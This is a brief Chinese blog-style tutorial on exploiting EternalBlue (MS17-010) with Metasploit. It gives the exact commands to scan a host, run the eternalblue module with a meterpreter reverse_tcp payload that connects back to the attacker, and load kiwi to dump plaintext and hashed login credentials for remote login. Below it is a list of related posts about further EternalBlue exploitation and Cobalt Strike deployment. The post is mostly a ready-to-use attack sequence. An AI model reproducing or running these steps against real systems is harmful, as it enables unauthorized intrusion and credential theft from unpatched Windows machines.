MSF永恒之蓝使用

简介: MSF永恒之蓝使用

MSF永恒之蓝MS17-010


1. 扫描


use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)

set RHOSTS 192.168.167.60(设置被扫描ip)

run(开始扫描,查看是否存在)


检测到可以使用永恒之蓝


2.


use exploit/windows/smb/ms17_010_eternalblue(加载模块)

set RHOSTS 192.168.167.60(IP)

set LHOST 192.168.167.48 (设置本机IP)

set LPORT 4444 (设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始)

显示IP+端口>>>目标IP+端口(反弹成功)


shell(拿到权限)


3. 获取登录用户名密码


meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest


拿到登录密码


4. 下面就可以远程登录目标主机了

目录
相关文章
|
6天前
|
安全 网络安全 Windows
永恒之蓝上线CS
该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。
111 4
永恒之蓝上线CS
|
6天前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
126 1
|
5月前
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
61 0
|
6月前
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
60 0
|
6月前
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
124 0
|
7月前
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
193 5
ms17-010(永恒之蓝)漏洞复现
|
7月前
|
安全 数据安全/隐私保护 Windows
“永恒之蓝”勒索病毒检测+恢复工具
预测第二波WannaCry勒索病毒攻击即将到来! NSA黑客武器库泄漏的“永恒之蓝”发起的病毒攻击事件。 解决方案:勒索蠕虫病毒文件恢复工具 检测工具下载
121 0
|
安全 Linux 网络安全
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(一)
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位(一)
|
12月前
|
安全 网络协议 关系型数据库
永恒之蓝漏洞利用
永恒之蓝漏洞利用
135 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
346 0